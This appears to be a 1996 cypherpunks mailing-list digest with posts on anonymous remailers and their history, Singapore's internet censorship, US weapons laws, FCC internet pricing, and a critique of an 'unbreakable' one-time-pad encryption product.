1996 San Francisco Examiner > SAN FRANCISCO (Aug 27, 1996 3:11 p.m. EDT) -- Hoping to reduce or end > a subsidy that has kept down the cost of on-line service, local phone > companies here have presented the Federal Communications Commission > with studies arguing that Internet users are overtaxing phone networks > and ought to pay more for monthly service. > The studies, one of which was published on the Internet, argue that a > 13-year-old subsidy lets Internet service providers (ISPs) pay a > fraction of what a long distance company pays to get a phone line, > even though Internet calls may use more phone system capacity than > voice traffic. [...] > For their part, ISPs are alarmed at the remote possibility that the > FCC might let phone companies raise their monthly costs from the > current monthly average of $30 to anything approaching the $600 that > some long distance carriers pay for a phone line. > "If we had to pay anything like long distance access charges, it would > put all the ISPs out of business," said Ronald Plesser, the > Washington, D.C., attorney who represents the Commercial Internet > Exchange, an ISP trade group. > FCC staff attorney Kevin Werbach said the subsidy began in 1983, when > the five-member federal commission created a special rate to encourage > the growth of on-line services, voicemail companies and other emerging > industries that offered enhanced electronic services over phone lines. > In 1987, the FCC considered ending the subsidy but backed down after > public protest over what came to be characterized as the "modem tax." > Given the growth in on-line usage, ISPs assume any talk of ending the > subsidy would create a bigger backlash today. > "There are a minimum of 20 million and perhaps as many as 40 million > on-line and Internet users and many of them are registered voters," > said William Schrader, president of PSI Net, an ISP in Herndon, Va. > Schrader said when he visited several FCC members recently, he > suggested that many of those users would be happy to send a letter of > protest to FCC Chairman Reed Hundt. [...] > Copyright © 1996 Nando.net From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 13:16:26 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Tue, 3 Sep 1996 04:16:26 +0800 Subject: More child pornography nonsense Message-ID: <01I906YVP1M89JDI20@mbcl.rutgers.edu> > webslingerZ > _________________________________________________________________ > POLICE SEARCH INTERNET FOR CHILD SEX ABUSERS > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > STOCKHOLM, Sweden (Aug 31, 1996 00:11 a.m. EDT) - Police across Europe > widened their net Friday to track down a pedophile network which is > spreading increasingly to the hard-to-detect Internet, while at an > international conference, Southeast Asia was cast as a major > destination for child sex tourists. > At the World Congress Against Commercial Sexual Exploitation of > Children, which has attracted over 1,000 delegates to Stockholm from > 130 countries, campaigners outlined measures to crack down on > pedophiles' use of the Internet. > Norway's ombudsman for children, Trond Waage, said to date there was > very little action that could be taken to stop the distribution of > child pornography on the Internet. > But he said the establishment last week of an international body to > monitor child pornography on the net, a task taken on by the Norwegian > branch of Save the Children, was firm action against pedophiles using > the net. > "This is a kind of a cybercop," Waage told reporters. > "We need some visible cops on the net. If you undertake these kinds of > criminal activities someone will monitor you." > Save the Children will try to monitor any child pornography on the > Internet and is encouraging other net surfers to pass on information > that will be handed to the police. Want to bet how fast they'll be mail-bombed? Cops on the net are _not_ popular, no matter what they're doing. This fact is especially true when there's no actual harm taking place (unlike, say, spamming) - the harm has _already_ taken place by the time the material is on the Internet. Should we ban films with violence because they _might_ be snuff films? -Allen From qut at netcom.com Mon Sep 2 13:16:35 1996 From: qut at netcom.com (Dave Harman OBC) Date: Tue, 3 Sep 1996 04:16:35 +0800 Subject: Free Speech and List Topics In-Reply-To: Message-ID: <199609021759.KAA00489@netcom21.netcom.com> ! At 5:17 AM 9/2/96, qut wrote: ! ! >About the need for limits for anonymity, guess what brought that on? ! >Crime? Yes! The crime of the media monopoly violating the anti-trust ! >acts, because people are ignorant enough to trust the mass media for ! >their news. I just mean to throw the media's lies right back at them. If crypto anonymity is considered to lend itself to crime, no doubt by the same logic, mass media collusion lends itself to crime. And American mass media collusion IS a crime, crypto anonymity is not. It's been a hundred years since it became illegal to violate the Sherman Anti-Trust Act. ! No self-respecting Cypherpunk thinks the Antitrust Act and related acts are ! worthy of enforcement. ! ! (Think of how the technology we support will tend to allow new avenues for ! price collusion, interlocking directorates, new forms of business combines, ! unreadable secure communications with foreign competitors, and so on, all ! things the Antitrust regulators are already growing worried about.) And should! No doubt the media is colluding for criminal purposes and shady outfits like The New York Times should be seized and analysed by Department Of Justice anti-trust invesigators. From tcmay at got.net Mon Sep 2 13:19:45 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 3 Sep 1996 04:19:45 +0800 Subject: The Earliest CP Remailer *DID* Emphasize Anonymity Message-ID: At 7:22 AM 9/2/96, Bill Stewart wrote: >>From what I know of remailer history, the main original goal >of the cypherpunks-style remailer was to provide >security against traffic analysis by eavesdroppers, rather than to >prevent the recipient from knowing the sender's address, though >everybody pretty quickly realized that the latter was an interesting >feature, especially coupled with posting to Usenet. No, the focus was at _least_ as much on providing anonymity as on protection from eavesdroppers or traffic analysts. More so, actually. How do I know this? Well, I was the one who did the presentation on Chaumian mixes at the first meeting, describing them as remailers and using paper envelopes-within-envelopes to illustrate the concept. Later that day, in the "Crytpo Anarchy Game" we played to educate the attendees, remailers were used to post anonymous offers of goods and services, to make contact in message pools, and to generally implement a crypto-anarchic, distributed system. (With some obvious flaws, stalls, and other weirdnesses.) Still, it embodied most of what we see today (and a lot more that we still haven't managed to implement). The next afternoon, Hugh Daniel, Eric Hughes, and I went out for some bagels and talked about what had been learned. Either Hugh or Eric had the idea of coding up the remailer in C or Perl. As it turned out, Eric was the one to do it, a few weekends later, using Perl (which he learned enough of on Saturday to then do on Sunday). The first remailer was put for use and immediately began to be used for anonymous postings. And all of the early uses were explicitly to anonymize the sender, not to deter eavesdropping (which conventional crypto works well for, anyway). The Kleinpaste-style remailer was in a nascent stage, and Julf was running one on his site. But we all knew the longterm advantages of chained remailers, and, of course, even the very first Hughes remailer supported arbitrary chaining. And we also knew of the central defect of the Kleinpaste-style anonymizer, that law enforcement would seek the records through subpoena. As it turned out, penet lasted longer than I for one thought it would. PGP encryption was added soon after to the Hughes-style remailer, by Hal Finney, as I recall. Later developments, by Matt Ghio, Lance Cottrell, etc., added to the capabilities. So, the anonymizing and arbitrary chaining (which is for protection against collusion of the remailers and subpoenas of logs) features were there from the start. Even before the start, as the "Crypto Anarchy Game" had them. (I've been clear that it was Eric Hughes who coded the first Perl version, but I feel I have to make my own role clear. There are some critics of me here on this list who have claimed "Tim has never done a thing for Cypherpunks except talk." Well, besides organizing the first meeting with Eric, and giving the morning talk on the topics mentioned, and demonstrating the role of mixes and digital cash, and writing articles on many topics, and setting up BlackNet (which actually works, and is not just an idea), and on and on, I'm satisfied with my contributions. Your mileage may vary.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From qut at netcom.com Mon Sep 2 13:23:58 1996 From: qut at netcom.com (Dave Harman OBC) Date: Tue, 3 Sep 1996 04:23:58 +0800 Subject: Sharp Knives In-Reply-To: <199609021720.MAA06616@manifold.algebra.com> Message-ID: <199609021809.LAA01872@netcom21.netcom.com> ! How do these Ninja stars work anyway? ! ! I've heard about them, but do not know much. I don't know either, they're as illegal to own as it is to rip off a car! From markm at voicenet.com Mon Sep 2 13:28:55 1996 From: markm at voicenet.com (Mark M.) Date: Tue, 3 Sep 1996 04:28:55 +0800 Subject: Cypherpunk Mailboxes? In-Reply-To: <199609021534.KAA26279@mailhub.amaranth.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 2 Sep 1996, William H. Geiger III wrote: > Hi, > > I have a thought for addressing the anon. problem. > > We could create a network of anonymous remailers with mailboxes. All > messages in the mailboxes are stored encrypted. No information about the > users are keep. Users would be be given x K of mailbox space. > > We could use PGP keys for encrypting the messages. Each user would have his > own key pair for his anonymous mailbox. Any plain text messages received to > the server would be encrypted on recept. > > Let the government's subpoena away. :) > > "Sorry we don't have user addresses, no I can't decrypt those messages > Senator." > > What do you think? The only problem is there has to be someway for users to retrieve their mail. The current nym server approach is to use an encrypted reply block to send a user new mail. This way the nym server doesn't know who the user is. If users have to actively retrieve their mail, then the feds could install a packet sniffer on the remailers net link to find out the real email address of an anonymous user. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMiscESzIPc7jvyFpAQGQ8ggAoHoGwwLI/8WI3XEBvA/Yo/lOPu1bQGYZ +m/jYzZjlF/YcS54J+H+L+xRo9WcOJkm7LLetTRZM3N/vG71M01vLcoOnfciRjFz AhLj2V5DGEcyQE0GMBXOxgxKvnzMVkFJh6ZWFalIM0DedncdX541W3j+almPb7Yr YyT+On5mqbPd0U5rJgv2CfE5CFlAE7XyO0KteH5aONK3f6TxzGH4cGG8wSZaBiu4 jP55nTl8VdtMH7MBDqOFkAH7IOboDZzjDglbuFHFk/nhtKfYIzg4c/ck5VCZ1vs8 xIqaPIMzpQF/smfKS2upyhZB1fb3G101lUJmjoVkEATQhwMzLBhY1Q== =QbyB -----END PGP SIGNATURE----- From amehta at giasdl01.vsnl.net.in Mon Sep 2 13:41:35 1996 From: amehta at giasdl01.vsnl.net.in (Arun Mehta) Date: Tue, 3 Sep 1996 04:41:35 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age Message-ID: <1.5.4.32.19960902174515.0032f9cc@giasdl01.vsnl.net.in> At 19:13 02/09/96 +1000, James Seng wrote: > > What i am saying is that Asian (Singapore) >values are _DIFFERENT_ from western (America) values. [i know i am generalising] > >When you look at the laws and regulation. You cannot just look at what you >think is best. You have to look at other things. Culture, social and >economical structure, religion and history. In every aspect, Singapore (or >most Asian for that matter) are different. Thus, you cannot judge a >Singapore government action based on your social background. I've been reading some of the postings on singapura.singnet.com.sg: quite a few people in Singapore are pissed off that they have to go through the proxy. So, not everyone in Singapore thinks as differently from those of us who oppose your government's action as you would have us imagine. Look, if the government had said, "those who wish to avoid smut on the Net, go through this proxy, but those who do not wish our guidance can do as they please," we would not be having this discussion. What we have a problem with is the government trying to *force* on everyone its own judgement on what is appropriate. People like you in Singapore are responsible, thinking adults. Surely you can make the choice yourself on whether you wish to accept government guidance in this or not? > >Sad to say, Singapore government does have a lot of power. But i am glad >what you mention isnt happening in Singapore. I havent heard of any serious >corruption cases or people accepting bribes etc. Nor does the people here >feel a suppressed nor are there general disatifaction. I think you are too >influenced with the persepection from 1984. *8) In 1975, Indira Gandhi imposed a totalitarian regime in India. The newspapers only carried news about how happy everyone was with the controls. Lulled into complacency, Mrs. Gandhi called elections, partly to make everyone shut up. What happened? She was soundly defeated. Moynihan, a former US ambassador to India, remarked, "Politicians rarely like what they read about themselves in a free press, but it can save their skin." Or words to that effect. Maybe, just maybe, there is far more corruption in Singapore than you think, but that you have no way of finding out without a free press? Arun Mehta Phone +91-11-6841172, 6849103 amehta at cpsr.org http://www.cerfnet.com/~amehta/ finger amehta at cerfnet.com for public key From ponder at freenet.tlh.fl.us Mon Sep 2 13:53:50 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Tue, 3 Sep 1996 04:53:50 +0800 Subject: new-thinking mailing list tidbit; Singapore slings Message-ID: keywords: thought police; mind control; Stone Age; cluelessness; Island nation; why are remailers bad? the mailing list 'new-thinking' has an interesting piece in the current issue, speaking of on-line communities of interest. the archive is at: ******************************************************************** For a hyperlinked version of this piece, please go to: http://www.nua.ie/NewThinking/Archives/newthinking011/index.html For New thinking archives, please go to: http://www.nua.ie/NewThinking/Archives/index.html ******************************************************************** +++++ sounds like the Singapore brainwashing is working pretty well if their educated people are opposed to even a discussion of whether free speech is a good thing or not. Yikes. It isn't a cultural thing, pinhead. Get life, government goon. Free speech is the right to say things others - even a _majority_ or even the government - may find unpopular. And you can tell your fascist dictator I said so. -- P.J. Ponder OBCrypto: for a keyed-SHA signature system, is there an advantage to pre-pending the keystring as opposed to appending it? I think I read something about this in one of Hugo Kracyk's (sp) papers about a keyed-MD5 system, but now I can't find it. If I recall correctly, he explained why it was better to put the key part in the beginning, instead of the end.... Thanks for any help. [Anti-Dyson and anti-EFF rant left off for now. waiting for more responses from EFF et al. Was nice to get a reply from Esther Dyson. Didn't change my mind about anonymity being a good thing, though. It will be interesting to see what Julf gets back from his survey of why people are opposed or in favor of anonymity.] [See the web page listed in the press release from penet.] I looked at the FTP, Inc. software site referenced here a few days ago for the email package that integrates PGP. Pretty hefty package to ftp over a 28.8 dialup. The write-up on the web page looked good - I'll ftp it at the office over the T1 if I can and see what it does. I assume it blows up after the 30 days (or whatever the trial period is)? From amehta at giasdl01.vsnl.net.in Mon Sep 2 14:00:15 1996 From: amehta at giasdl01.vsnl.net.in (Arun Mehta) Date: Tue, 3 Sep 1996 05:00:15 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age Message-ID: <1.5.4.32.19960902174507.0032cf14@giasdl01.vsnl.net.in> At 15:18 01/09/96 -0700, Rishab Aiyer Ghosh wrote: >Arun Mehta wrote: >> and India will be too: the law here holds the ISPs responsible >> for ensuring that nothing objectionable and obscene is carried by >> them, and what simpler way to comply than to > >FWIW: "There is no need to licence content providers; Internet >service providers are not responsible for illegal content." R K >Takkar, Indian Telecom Secretary (at the time of interview) What Mr. Takkar says isn't law, plus he's gone. The law clearly holds ISPs responsible for content: when it suits the government it will pull it out. Doesn't even have to be the government: some headline-seeking opposition politician could take the government to task because the government-run ISPs aren't complying with the law. And please don't get lulled into complacency by a stupid law that isn't being enforced: in 1975, Indira Gandhi pulled out a host of them to *legally* impose dictatorship. >> Ideally, I should be able to >> send via pgp and anonymous remailer a request for a page, which would soon >> come beamed down unencrypted via satellite. No more waiting hours >> for the latest version of Netscape to download > >(!) you'll only have to wait hours for your anonymous-remailer-web-to-e-mail >gateway, EVERY time you want a page. every time I want a BANNED page -- I'd say it's worth it. In the process of accessing it, I also show it to everyone in Asia, thus giving the banned stuff much more publicity than it otherwise would get on the net. >governments will >eventually see sense and stop censorship, if they're interested in >making their countries rich. Singapore in every other field of work >has shown its interest in deregulation; I would expect them to do so >on the Net as well, when it becomes clear that there's rather more to >it than porn and subversion. Governments everywhere (see Declan's long list) seem to think they can separate out the porn and subversion from the "rather more". Just as in the German case, where the Zundel-site was mirrored so that Germans could access it, external measures to help Singaporeans access what they like would certainly help their government "see sense." >In the meanwhile, there's not much point >trying to "help" them, apart from providing moral support. Guess I'll risk being accused of indulging in cliches when I cite the famous Niemoeller quote once more which begins, " First they came for the communists, and I did not speak out, for I was not one"... and ends "And then they came for me. There was no one left to say anything..." Freedom is won and lost in inches, and you have to fight every single inch they try to take away. Arun Mehta Phone +91-11-6841172, 6849103 amehta at cpsr.org http://www.cerfnet.com/~amehta/ finger amehta at cerfnet.com for public key From qut at netcom.com Mon Sep 2 14:05:40 1996 From: qut at netcom.com (Dave Harman OBC) Date: Tue, 3 Sep 1996 05:05:40 +0800 Subject: Silenced Machine Guns Are Safer Than TWA Message-ID: <199609021837.LAA05216@netcom21.netcom.com> tcmay at got.net (Skippy) wrote: ! At 4:33 AM 9/2/96, qut at netcom.com (Net God) wrote: ! ! >Contrary to popular fiction, ALL firearms have been permanently ! >registered since the 1968 Gun Control Act. The media monopoly lies when ! >they say the contrary. ! ! Nope. Gun sales between individuals without any paperwork were fully legal ! in some places until recently (and may still be fully legal...I can only ! speak of California). So? I was talking about NEW sales of firearms from license holders. Let's consider improving the future rather than preserving the past, shall we? ! >From 1974 until a couple of years ago, I bought and sold a dozen or more ! rifles, handguns, and even Evil Assault Weapons, mostly through fully legal ! gun shows. I even sold a .357 Smith to some guy, made a joke about how ! great these gun shows were and how great it was to be able to just take ! cash and hand over a gun without any paperwork...the guy laughed and said ! he was a San Jose cop. I felt nervous for a few seconds, but quickly ! realized there was no law *I* was breaking, so I laughed too. ! ! Most of these guns I kept no records on, nor did any laws say I had to. ! ! (A few years ago it became necessary for even private citizen-units to ! obtain the proper firearms transfer papers from the gubment. I wanted to ! sell a laser-equipped Heckler & Koch SP-89 without creating a paper trail ! (as I'd not had one when I acquired the piece a few years earlier), so a ! friend of mine used his friendly neighborhood libertarian FFL dealer, who ! has a policy that the stack of transfer forms he is required to keep on ! file will mysteriously burn up if the Feds ever seek out his records. (Who ! knows if he'll abide by this policy, but the point is that there are ! literally tens of thousands of these "kitchen table FFL dealers," and no ! computerized filing of records. This is one reason I quit the NRA: they are ! advocating the "instant check." Such an instant check would mean massive ! computerization of all files, and of course cross-referencing to files on ! citizens. This would be much worse than the "paper chaos" of stacks of ! firearms paperwork sitting in dusty filing cabinets. I'll take a 10-day ! ineffectual waiting period to a Big Brother database of all purchasers.) So you'ld prefer the security of obscurity? I'd prefer to have much more government protected rights, openly. Do you belive the civil courts have a role in protecting people's rights? If so, then "government protected rights." ! >BTW, I muse that the issue of guns, drugs and censorship make an ! >excellent litmus test for libertarians: either you support the ! >legalization of, all of, or your a fake. ! ! I'm not sure what the "legalization of censorship" would mean, though I ! support the right of anyone to screen out what they choose not to read or ! view. And I support the right of companies to decide what materials to buy, ! have viewed by employees, etc. (So if the "Valley Lesbigays" want to show a ! tape at Hewlett-Packard, H-P can just say "Nope--we're not interested.) ! ! I fully support legalization of all drugs, all guns, and am unalterably ! opposed to any form of government censorship. I meant the good side of the censorship issue! But I also support enforcement of the anti-trust laws, so some would view the court enforced break up of illegal collusion of the media to crush competition as "government censorship." From qut at netcom.com Mon Sep 2 14:27:35 1996 From: qut at netcom.com (Dave Harman OBC) Date: Tue, 3 Sep 1996 05:27:35 +0800 Subject: Sharp Knives In-Reply-To: Message-ID: <199609021911.MAA08644@netcom21.netcom.com> ! At 1:38 PM 9/2/96, Dave Harman OBC wrote: ! ! >In California, it's a felony to merely *own* a Ninja star. It's a ! >felony to carry a *concealed* knife, but carrying it openly in a ! >holster is legal. It's a felony for most people to carry a ! >concealed loaded handgun on the street only on a *second* offense. ! >It'a a felony to merely *own* a switchblade, brass knuckles, etc. ! >Do our weapons laws sound strange? Are many of our weapons laws ! >stricter than countries like Sweden? Yes! ! ! Most laws about knives, dirks, daggers, brass knuckles, saps, etc. were ! devised to control the coloreds, who could not afford the weapons of choice ! of whites and other gentlemen. ! ! Hence, a colored who gets picked up on some charge, or detained, can be ! jailed on a felony charge for having a pocketknife, or a sap, or brass ! knucks. Coloreds from Asia can be jailed for having the martial arts sorts ! of weapons. ! ! A white gets a misdemeanor charge for carrying a gun. Of course, whites never commit other crimes, are never on the proscribed categories, and people of colour never carry guns or are never free of being classified as being in the proscribed categories. You sound like Skippy making fun of the McClatchy newspapers. ! (This analysis is not original with me. The gun magazines have noted the ! racist origins of misdemeanor/felony dichotomies for many years. One ! article I read a few years ago traced the precise times at which these laws ! came into being...mostly the times in various states corresponded with ! periods of high immigration of coloreds to major cities.) ! ! Here in California there's a bill pending in the legislature which would ! decriminalize the carrying of a pocketknife that can be opened with one ! hand (a la the Spyderco, Benchmade, Buck, Cold Steel, etc., knives with ! thumb holes or studs). Even though such knives are openly sold in every ! sporting goods store I have ever been in, and are carrried by a truly large ! fraction of the population, such knives are currently classified as ! "switchblades" and can be prosecuted as a felony. A good way to selectively What? Are you talking about lockbacks? An actual switchblade is a felony to *possess* in California. ! harasss someone. Interestingly, it was the District Attorneys lobbying I'm familiar with the anti-racist pandering of the gun rights majority. The weapons mentioned above were banned later this century in California, ostensibly to protect minors. There has always been cheap firearms available to poor people in America, I'm not aware that only coloured people can be poor! It's been a step by step process to take away rights, it's been entirely irrelevent what the laws were supposedly for. It is not believable that all whites are rich or that poor whites in prison are treated with greater respect than rich people of colour or poor people of colour. There's been *both* racist and anti-racist elements to the progress of unjust laws, the original intent of the law itself is forgotten if the current law only respects people of capital. From nobody at replay.com Mon Sep 2 14:39:03 1996 From: nobody at replay.com (Anonymous) Date: Tue, 3 Sep 1996 05:39:03 +0800 Subject: Too few nymservers Message-ID: <199609021918.VAA21564@basement.replay.com> On Sun 1 Sep 1996 Dave Harman OBC wrote : [snip] > There has to be more crypto anonymizing aliasing remailers and with > easier interfaces. Closing the Kleinpaste derived server will help > put the pressure of demand to start better remailer systems. > There's not enough capacity and reliability with the servers extant. > There should be thousands of full featured remailers. Exactly. Sometimes *all* the nymservers are down at the same time. From cmcurtin at research.megasoft.com Mon Sep 2 14:53:48 1996 From: cmcurtin at research.megasoft.com (C Matthew Curtin) Date: Tue, 3 Sep 1996 05:53:48 +0800 Subject: Pseudocrypto detector is going wild (was: Re: ALPHACIPHER - An unbreakable encryption program.) In-Reply-To: <01bb94a6.44902540$8adc9dcc@survival> Message-ID: <864tlgivwo.fsf@goffette.research.megasoft.com> The following message is a courtesy copy of an article that has been posted as well. -----BEGIN PGP SIGNED MESSAGE----- "Alex Walker" writes: > The strongest encryption system available to the public will be available > soon at: > http://www.aa.net/cyber-survival-hq > > ALPHACIPHER has been in the making for the past ten years, and has come > into its own > with the proliferation of Internet communications. > > A demo of this program along with a FAQ can be downloaded from > cyber-survival-hq 1SEP. This is an unbreakable program... Here we go again. I just got done surfing the site above. Assuming that all statements regarding the unbreakability of the cipher, the lack of applicability of the question regarding its key size, etc., are at least based on some degree of truth, "alphacipher" is a one-time pad. Given that anything else is not really "unbreakable," if it's not a one-time pad, the claims about its security are bogus. But let's assume that it is. In exchange for the great security of one-time pads, users of such must be willing to tolerate their drawbacks, and there are some significant ones. 1 The unbreakability of the one-time pad is completely thrown out the window if the key is not _truly_ random. A software based pseudorandom number generator simply won't cut it; even the best PRNGs will have some degree of predicability. It is possible that these random keys are truly random (given point 2, below), but I find this to be unlikely, since the overview boasts that the keys are generated by a "proprietary random key set generator." Now, we're getting into *another* issue, and that is of the wisdom (or, more correctly, lack thereof) in using proprietary algorithms. Not only does this fail to ensure any higher level of security when compared to that of a well-known algorithm, but actually increases the liklihood that an error has gone undiscovered, since fewer experts have had the opportunity scrutinize it. 2 The pool (or "pad") of random bits from which the keys are generated must be distributed ahead of time. Given this requirement, the "random bit pad" must be distributed with the program itself. In fact, the two "comm key disks" seem to be just this. A third "vault key" disk, used for local online storage, seems to be another random bit pad. 3 Keys must stay perfectly in sync. A single bit-shift either way, and you're hosed. Given that there is a finite number of bits in the pad (as there must be, since they need to be precalculated and distributed with the program), that they all must stay perfectly in sync, and that the program appears to be marketed for widespread (albeit low-bandwidth) use, there must be some mechanism by which the encrypting program can tell the decrypting program how far along in the bit pad to advance before using them for the key. Otherwise, if I send a message to Alice, then I send one to Bob, Bob is going to use a different starting point in the pad for the key assembly than I did to create the message, unless he also received a copy of what I sent Alice, and every person before that. Giving an indication of the byte offset to use for decryption seems the only workable solution to this problem. 4 The keysize must be exactly equal to the size of the plaintext to be encrypted. 5 Bits from the pad that are used for key generation must never be used again. Ever. Since there are only two "comm key" disks, which must be the same for every distribution, you can get probably get somewhere between two and 10 million "random" bits on the disks, depending on whether you're using compression, and if so, what compression algorithm you're using. Let's assume that you've got 10 million bits on there. Since the encryption of one bit exhausts one bit from the pad, I can exhaust the entire supply by sending someone a 10MB mail message. Or two five MB mail messages, or 10 one MB messages. In any case, it doesn't take long. And as soon as I'm out, if I start over again at the beginning, I'm blowing the security, since I'm reusing keys. 6 Anyone with access to the key pad can decrypt a message sent to anyone else, as long as they know the proper bit offset. Because of what I've described in item 3, it seems likely that I'll know that ahead of time. Hence, the security of the "alphacipher" encrypted messages decreases with each additional user that "alphacipher" gains. So, it seems to me that I can break *any* message that anyone encrypts with "alphacipher" by getting a copy of the comm key disks, figure out how "alphacipher" calculates where in the pad to begin generating the key, and apply the appropriate key to the encrypted message. Perhaps a bit of additional obfuscation is occuring somewhere in there, but the basic premise is that because of what it's trying to do, this has to be a very poor implementation of a one-time pad, and therefore completely vulnerable to passive attack. (This is using the "comm key"; the "vault key" has much more potential, since it can be unique for every user, but it can still be exhausted very quickly, and therefore have a successful cryptanalysis made of that data, using other means: a larger amount of data will be necessary to reconstruct the bit pad before any messages can be broken, but once again, after it's constructed, anything encrypted using that bit pad can be broken. And, since it seems unlikely that we're dealing with REAL random numbers here, this probably isn't nearly as tough as it ought to be.) I have absolutely no knowledge of "alphacipher" beyond what is contained in the original posting I saw on alt.security which pointed me to the web page (http://www.aa.net/cyber-survival-hq/Alpha1.htm) but it seems that I've made a decent (albeit trivial) analysis of its weakness, and at least given serious raise to your ability to make such claims about its security. If I'm wrong, please show me how so. If not, please do us all a favor and quit with the advertising claims. (All I need now is someone to threaten to sue me, and I'll maintain my record of having lawsuit threats made against me every time I criticize something that claims to be "strong crypto.") - -- C Matthew Curtin MEGASOFT, INC Chief Scientist I speak only for myself. Don't whine to anyone but me about anything I say. Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Have you encrypted your data today? iQEVAwUBMisu2X6R34u/f3zNAQFKSgf/T/cB0X33sDGHoiqVfbXZcW9VEFBcbtVA bTjFLEKrh89pEeZ8VR7FsZRkbC5C7ceuy1aoTAK+RLdaOBZN8AkOTWXvo139gVW/ 9P+gv8eitZlhWzSnXfpURp45m737wjRfgsP7drgWZr3AdGCu3XOipIyy3tcJrcGY fPBpBZXvAfdmxX5B3CiRgLFOdhVxzhyO7Cv019ybRTCYjZncPEyyXIYMzrCJkyBi QbZzcsvgwTq+vD0Cw9/REVqxH6Av3tzJacLLgo33hO1cvti9910FcTSCIdnmR+E+ Pse2Gm0nx8Ochcfw2ZmEVtJI7hXkLbOXMq7i/i++jtMSeMVrIsfXUg== =ZbJf -----END PGP SIGNATURE----- From jamesd at echeque.com Mon Sep 2 15:30:16 1996 From: jamesd at echeque.com (James A. Donald) Date: Tue, 3 Sep 1996 06:30:16 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age Message-ID: <199609021945.MAA05327@dns2.noc.best.net> At 07:13 PM 9/2/96 +1000, James Seng wrote: > What i am saying is that Asian (Singapore) > values are _DIFFERENT_ from western (America) values. One of the classic Greek rationalizations for slavery was that Asians are slaves by nature. It would seem that you are saying that they were right. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From unicorn at schloss.li Mon Sep 2 15:47:56 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 3 Sep 1996 06:47:56 +0800 Subject: Sharp knives In-Reply-To: Message-ID: On Mon, 2 Sep 1996, Asgaard wrote: > "James A. Donald" , writes: > >I heard on talk.politics.guns somebody say that in Sweden they > >had banned knives with a sharp point at the end, and were going > >to ban sharp knives altogether. I think he was just engaging in > >hyperbole, that he really meant that gun control in Sweden was > >unreasonably strict, but on reflection I am not sure. > > There is a law in Sweden, some 5 years old, against carrying > 'dangerous devices' (hunting knives, Ninja stars etc) in 'public > places' (unless you are a carpenter, electrician or some such > going about your business). It's okay to carry a knife when > going fishing/hunting or sitting on your terrace carving totem poles. > It's only a misdemeanour and might be punished with a fine, > but usually the cops just use the law to disarmour street gangs > on the spot. The effects of the law are dubious. Knives have come > into fashion among teenagers after this legislation (but not as > a consequence of it, I think). This mirrors D.C.'s concealed weapon law. A screwdriver is a weapon if you are carrying it for that purpose (i.e. if the cop thinks he wants to arrest you) but a tool if you are carrying it for that purpose (i.e., if you are wearing an expensive suit and look non-ethnic). > > Asgaard > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 15:49:22 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Tue, 3 Sep 1996 06:49:22 +0800 Subject: Scoring Politicians on Digital Liberty Issues (Re: Net Politics) Message-ID: <01I90CVK55W89JDDSI@mbcl.rutgers.edu> I would suggest that support for "parental empowerment" and for any sort of mandated rating system (e.g., PICS with a requirement to rate pages for parental censorship use) be a down-rating. -Allen From perry at piermont.com Mon Sep 2 15:54:56 1996 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 3 Sep 1996 06:54:56 +0800 Subject: desubscribe In-Reply-To: Message-ID: <199609022045.QAA21135@jekyll.piermont.com> Christopher Carper writes: > desubscribe Never. From gnu at toad.com Mon Sep 2 15:56:10 1996 From: gnu at toad.com (John Gilmore) Date: Tue, 3 Sep 1996 06:56:10 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com> Message-ID: <199609022031.NAA28702@toad.com> > >>Is this _really_ the EFF policy on anonymopus remailers?? EFF does not have an agreed-upon position on anonymity (or anonymopusity). Each of us speaks as individuals on the topic. Several EFF board members have experienced problems around anonymity. On the Well, there was an experiment in anonymity which ended poorly. I wasn't there so it's hard to critique it in hindsight. But it certainly convinced ex-EFF-board-member Stewart Brand of the dangers of anonymity. Personally I'm in favor of anonymity. I've researched the Supreme Court cases that support it, and spoken on panels in favor of it. I frequently point out that postal mail and telephones are anonymous, and the world has not disintegrated. Part of what started the cypherpunks in the first place was the anonymous remailer game, in which some players tried to figure out who was passing notes to who, while the others tried to conduct transactions anonymously under their noses. I was arrested at an airport a few weeks ago, and kept in custody for 2-1/2 hours, for refusing to identify myself (and failing to turn on my laptop on command!). If the ACLU is interested, I'd love to make a test case out of it. I think in America we have -- and should work to keep -- the right to travel within our borders without identifying ourselves or producing any kind of government "papers". But I sure can tell you I got mad when someone "anonymously" punctured the tires of the car I was driving, for many weeks in a row. The hardest part was that I had no way to figure out WHY they were doing it -- there was no way to communicate with them. (Perhaps I should've painted a message on the tires...) If you think the problem with anonymity is restricted to physical damage, think again; there are ways to do non-physical damage. "Outing" people who have secrets is one way; confronting people with ideas that they are unprepared to deal with is another. Not to mention theft of intellectual property, fraud, and other economic 